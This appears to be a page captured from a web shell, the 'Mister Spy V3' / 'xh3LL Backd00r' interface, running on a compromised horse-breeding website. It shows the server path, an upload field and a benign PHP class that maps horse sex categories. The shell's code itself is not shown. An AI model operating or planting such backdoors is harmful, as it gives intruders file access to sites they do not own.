Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/espanol/library/
Upload File :
Current File : /home/caballoscriollos/public_html/espanol/library/class.sexos.php

<?php

class Sexos
{ 		
	/*
	const Hembra 	= 1; 15
	const Macho		= 2; 16
	const Castrado	= 3; 17
	*/

	const Castrado		= 0;
	const Macho			= 1;
	const Hembra 		= 2;
	const Indistinto 	= 3;
	const Reproductor 	= 4;

	static function GetById($IdSexo)
	{
		switch($IdSexo)
		{
			case Sexos::Castrado:
				return "Castrado";

			case Sexos::Hembra:
				return "Hembra";
				
			case Sexos::Macho:
				return "Macho";
								
			default:
				return "No Asignado";
		}
	}
	
	

	static function GetByNombre($Sexo)
	{
		switch($Sexo)
		{
			case "Castrado":
				return Sexos::Castrado;

			case "Hembra":
				return Sexos::Hembra;
				
			case "Macho":
				return Sexos::Macho;

			case "CASTRADO":
				return Sexos::Castrado;

			case "HEMBRA":
				return Sexos::Hembra;
				
			case "MACHO":
				return Sexos::Macho;
								
			default:
				return "No Asignado";
		}
	}

	static function ParseSexoSRA($Sexo) {
		return $Sexo == 'M' ? Sexos::Macho : Sexos::Hembra;
	}

	function GetAllPuntajes()
	{
		return array
		(
			array("IdSexo" => Sexos::Reproductor,	"Descripcion" => "Reproductor"),
			array("IdSexo" => Sexos::Castrado, 		"Descripcion" => "Castrado")
		);
	}
	
	function GetAll()
	{
		return array
		(
			array("IdSexo" => Sexos::Macho, 	"Descripcion" => "Macho"),
			array("IdSexo" => Sexos::Hembra,	"Descripcion" => "Hembra"),
			array("IdSexo" => Sexos::Castrado, 	"Descripcion" => "Castrado")
		);
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat